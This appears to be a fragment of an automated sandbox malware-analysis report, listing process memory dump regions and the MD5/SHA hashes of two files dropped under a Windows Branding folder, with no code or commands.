memory/3236-217-0x000002A45EFC8000-0x000002A45EFCA000-memory.dmp
memory/1916-218-0x0000000000000000-mapping.dmp
memory/1916-253-0x000001EC71FC0000-0x000001EC71FC2000-memory.dmp
memory/1916-254-0x000001EC71FC3000-0x000001EC71FC5000-memory.dmp
memory/1916-255-0x000001EC71FC6000-0x000001EC71FC8000-memory.dmp
memory/3680-260-0x0000000000000000-mapping.dmp
memory/1916-277-0x000001EC71FC8000-0x000001EC71FCA000-memory.dmp
memory/3680-279-0x000002D4F0BF0000-0x000002D4F0BF2000-memory.dmp
memory/3680-284-0x000002D4F0BF6000-0x000002D4F0BF8000-memory.dmp
memory/3680-281-0x000002D4F0BF3000-0x000002D4F0BF5000-memory.dmp
memory/4060-316-0x0000000000000000-mapping.dmp
memory/192-317-0x0000000000000000-mapping.dmp
memory/212-318-0x0000000000000000-mapping.dmp
memory/1248-355-0x0000000000000000-mapping.dmp
memory/3916-356-0x0000000000000000-mapping.dmp
memory/2560-359-0x0000000000000000-mapping.dmp
memory/3140-360-0x0000000000000000-mapping.dmp
memory/3948-361-0x0000000000000000-mapping.dmp
memory/1648-362-0x0000000000000000-mapping.dmp
memory/1116-363-0x0000000000000000-mapping.dmp
memory/3476-364-0x0000000000000000-mapping.dmp
memory/3864-365-0x0000000000000000-mapping.dmp
memory/2108-366-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 7ddf5fb0ee8289cc286b454a7b53a603 |
| SHA1 | 065aeffcc062d442671b3f67df6473bee9367b3a |
| SHA256 | 8f55881188f7be83a94148b548fee913bde5d658ea462dd9e4dc5945e41197e7 |
| SHA512 | 7783144e8b92512d4e9bf23664d56bdab30f3c97a3e7d31d4ca233f7f47bd69983e7f5f9f2469b420146460ae514b9c891a66aad06077f06d1df1cf9b15581a4 |
\Windows\Branding\mediasvc.png
| MD5 | 667d42e1a5ba6c7a929e8e77262a9861 |
| SHA1 | dd73058c4d6b851f3c347410342a0b7a9b2a689a |
| SHA256 | a6a996d5e38ac43969a5151393e87aa85b79d1a5bb4449ca1328c610e8803a1c |
| SHA512 | 7fb5611eba143a32faf3e20637c649ed78535578f7f64750b52586b3fbf738ad07a40f61fe7840204a7ee8d42fb75d7e6213579c7f4df114f3e135e72825bb53 |
memory/2880-369-0x0000000000000000-mapping.dmp
memory/2096-370-0x0000000000000000-mapping.dmp
memory/3684-371-0x0000000000000000-mapping.dmp
memory/3968-372-0x0000000000000000-mapping.dmp
memory/2716-373-0x0000000000000000-mapping.dmp
memory/1356-374-0x0000000000000000-mapping.dmp
memory/852-375-0x0000000000000000-mapping.dmp
memory/1176-376-0x0000000000000000-mapping.dmp
memory/1184-377-0x0000000000000000-mapping.dmp
memory/3168-378-0x0000000000000000-mapping.dmp
memory/3560-379-0x0000000000000000-mapping.dmp
memory/2880-380-0x0000000000000000-mapping.dmp
memory/2208-381-0x0000000000000000-mapping.dmp
memory/1808-382-0x0000000000000000-mapping.dmp
memory/852-383-0x0000000000000000-mapping.dmp
memory/1176-384-0x0000000000000000-mapping.dmp
memory/1176-394-0x00000217D45E0000-0x00000217D45E2000-memory.dmp
memory/1176-396-0x00000217D45E3000-0x00000217D45E5000-memory.dmp
memory/1176-400-0x00000217D45E6000-0x00000217D45E8000-memory.dmp
memory/1176-451-0x00000217D45E8000-0x00000217D45E9000-memory.dmp